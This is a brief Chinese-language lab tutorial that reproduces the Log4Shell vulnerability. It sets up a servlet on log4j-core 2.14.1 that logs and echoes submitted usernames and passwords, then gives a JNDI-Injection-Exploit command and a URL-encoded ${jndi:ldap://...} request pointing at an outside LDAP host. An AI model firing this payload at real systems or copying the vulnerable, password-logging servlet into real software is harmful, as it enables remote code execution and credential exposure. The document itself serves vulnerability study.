log4j
在项目中使用log4j
在pom.xml 中导入
1
2
3
4
5
6
7
8
| <dependencies>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.1</version>
</dependency>
</dependencies>
|
使用log4j
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
| package org.example.log4jweb;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
@WebServlet(name = "LoginServlet", value = "/login")
public class LoginServlet extends HttpServlet {
private final Logger logger = LogManager.getLogger();
@Override
protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
String name=req.getParameter("name");
String password=req.getParameter("password");
if (name==null||name.isEmpty()||password==null||password.isEmpty()){
resp.setStatus(400);
resp.setContentType("text/html");
resp.getWriter().write("name or password is empty");
return;
}
logger.info("name:{},password:{}",name,password);
String result= logger.getMessageFactory().newMessage("name:{},password:{}",name,password).getFormattedMessage();
resp.setContentType("text/html");
resp.setStatus(200);
resp.getWriter().write(result);
}
}
|
创建一个javaee 进行测试
作为测试,将会输入输入的name和password
虽然没有在前端解析,但是后端日志中已经成功解析
这个地方其实已经说明了参数是可控的
然后就可以使用jndi 进行复现了
首先运行jndi 工具
1
| java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open -a Calculator" -A "198.19.249.35"
|
然后发送请求
1
| http://localhost:8080/Log4jWeb_war/login?name=%24%7Bjndi%3Aldap%3A%2F%2F198.19.249.35%3A1389%2Fki0ww0%7D&password=456
|